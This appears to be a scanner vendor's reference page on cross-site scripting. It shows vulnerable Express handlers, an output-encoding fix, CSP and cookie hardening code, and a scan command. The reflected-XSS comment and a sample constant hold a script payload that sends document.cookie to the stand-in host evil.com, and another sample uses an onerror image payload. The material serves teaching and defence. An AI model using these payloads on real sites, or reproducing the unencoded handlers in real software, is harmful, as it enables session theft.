Cross-Site Scripting (CWE-79)
XSS allows attackers to inject malicious scripts into web pages viewed by other users. It's the most widespread web vulnerability, affecting an estimated 65% of all websites.
How XSS Works
An attacker injects malicious JavaScript into a web page. When other users view the page, the script executes in their browser with the page's origin, where it can steal cookies or session tokens, or redirect the user to a phishing site.
Reflected XSS
```javascript
// User input reflected in response without encoding
app.get('/search', (req, res) => {
  const query = req.query.q;
  res.send(`<h1>Results for: ${query}</h1>`);
});
// Attack: /search?q=<script>document.location='evil.com?c='+document.cookie</script>
```
Stored XSS
```javascript
// User input stored and rendered to other users
app.post('/comment', (req, res) => {
  db.insert({ text: req.body.comment }); // Stored as-is
});
// Later rendered without encoding:
// <div>{comment.text}</div> // XSS!
```
Secure Code
```javascript
// Output encoding prevents script execution
import express from 'express';
import { escape } from 'html-escaper';

const app = express();

app.get('/search', (req, res) => {
  // Coerce to a string first so a missing ?q= does not throw inside escape()
  const query = escape(String(req.query.q ?? ''));
  res.send(`<h1>Results for: ${query}</h1>`);
});
// React auto-escapes by default:
// <div>{comment.text}</div> // Safe in JSX
```
Types of XSS
- Reflected XSS: Malicious input reflected in the immediate response
- Stored XSS: Malicious input saved in the database and shown to other users
- DOM-based XSS: Vulnerability in client-side JavaScript that modifies the DOM
Prevention
- Encode output: HTML-encode all user input before rendering
- Use frameworks with auto-escaping (React, Angular, Vue)
- Set Content-Security-Policy headers to block inline scripts
- Use HttpOnly and Secure flags on cookies
- Sanitize HTML input with DOMPurify or similar libraries
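The following is an added example, not code from this page or from VEXLIT, showing the first three prevention points in one place: an HTML output encoder (a hand-rolled equivalent of the `escape` function from `html-escaper` used above), the reflected and stored rendering paths encoded on output, a Content-Security-Policy value that blocks inline scripts, and a `Set-Cookie` value with the HttpOnly and Secure flags. The function names, the `nonce` argument and the sample payload and comments are all constructed for the example.

```javascript
// Added example (not VEXLIT's code): output encoding for reflected and
// stored XSS, a CSP header that blocks inline scripts, and hardened cookies.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a value for insertion into an HTML element body or a quoted
// attribute. Hand-rolled equivalent of html-escaper's escape(); null and
// undefined become the empty string instead of throwing.
function escapeHtml(value) {
  return String(value ?? '').replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Reflected context: the query string parameter lands in the response body.
function renderSearchPage(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Stored context: comments read back from the database are rendered for
// every visitor, so encoding happens on output regardless of what was
// accepted on input.
function renderComments(comments) {
  return comments
    .map((c) => `<div class="comment">${escapeHtml(c.text)}</div>`)
    .join('\n');
}

// Content-Security-Policy value that allows only same-origin scripts and
// scripts carrying the per-response nonce; inline <script> injected by an
// attacker has no nonce and is blocked. `nonce` is assumed to be a random
// value generated for each response.
function buildCsp(nonce) {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

// Set-Cookie value: HttpOnly keeps document.cookie from reading it, Secure
// restricts it to HTTPS, SameSite=Lax limits cross-site sending.
function buildSessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample input modelled on the attack string shown above.
const SAMPLE_PAYLOAD =
  "<script>document.location='evil.com?c='+document.cookie</script>";
const SAMPLE_COMMENTS = [
  { text: 'Great article!' },
  { text: '<img src=x onerror="alert(1)">' },
];

console.log(renderSearchPage(SAMPLE_PAYLOAD));
console.log(renderComments(SAMPLE_COMMENTS));
console.log('Content-Security-Policy: ' + buildCsp('abc123'));
console.log('Set-Cookie: ' + buildSessionCookie('session', 'tok en'));
```

Encoding on output, not on input, is the property to check for: the stored comment keeps its raw text in the database, and every render path that emits it into HTML goes through `escapeHtml`. The CSP is a second layer that only helps if no inline script in the legitimate page runs without a nonce.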
VEXLIT Detection
VEXLIT traces user input from HTTP sources through template rendering and response output. Framework-specific rules detect unsafe patterns in Express res.send(), Django render(), React dangerouslySetInnerHTML, and 30+ other frameworks.
```shell
npx @vexlit/cli scan . --fail-on warning
```